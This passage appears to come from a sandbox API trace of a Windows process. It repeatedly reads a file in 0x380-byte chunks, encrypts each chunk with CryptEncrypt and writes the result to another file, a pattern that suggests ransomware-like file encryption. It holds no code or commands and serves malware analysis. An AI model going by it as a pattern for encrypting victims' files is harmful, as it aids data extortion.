lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.864] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.864] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.865] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.865] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.865] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.865] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.865] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.865] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.865] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.865] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.865] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.865] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.865] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.865] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.865] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.866] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.866] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.866] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.866] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.866] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.866] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.866] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.866] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.866] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.866] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.866] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.866] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.866] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.866] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.866] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.867] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.867] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.867] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.867] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.867] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.867] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.867] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.867] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.867] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.867] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.867] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.867] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.867] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.868] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.868] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.868] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.868] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.868] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.868] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.868] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.868] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.868] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.868] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.868] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.868] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.868] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.868] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.869] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.869] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.869] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.869] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.869] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.869] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.869] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.869] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.869] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.869] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.869] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.869] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.869] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.869] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.870] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.870] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.870] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.870] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.870] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.870] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.870] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.870] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.870] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.870] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.870] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.870] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.870] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.870] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.871] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.871] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.871] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.871] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.871] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.871] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.871] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.871] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.871] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.871] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.871] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.871] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.871] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.871] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.872] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.872] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.872] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.872] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.872] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, 